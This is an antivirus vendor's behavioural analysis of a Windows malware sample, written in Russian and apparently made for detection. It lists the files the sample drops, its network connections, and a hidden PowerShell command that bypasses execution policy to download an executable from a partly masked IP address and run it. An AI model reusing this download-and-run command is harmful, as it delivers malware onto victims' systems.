Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://88.##0.10.102/svchost.exe как %appdata%\svchost.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\svchost.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\rzdtfhgygeghdzВ .sct
- %APPDATA%\svchost.exe
- %APPDATA%\microsoft\crypto\rsa\s-1-5-21-1960123792-2022915161-3775307078-1001\699c4b9cdebca7aaea5193cae8a50098_36d1130a-ac2e-44f7-9dc1-e424fbcbe0ee
Удаляет следующие файлы
- %TEMP%\rzdtfhgygeghdzВ .sct
Сетевая активность
Подключается к
- '88.##0.10.102':80
- 'gi##ab.com':443
TCP
Запросы HTTP GET
- http://88.##0.10.102/svchost.exe
Другие
- 'gi##ab.com':443
UDP
- DNS ASK gi##ab.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\svchost.exe'
- '<SYSTEM32>\cmd.exe' /C %APPDATA%\svchost.exe' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://88.##0.10.102/svchost.exe','%APPDATA%\svchost.exe')' (со скрытым окном)
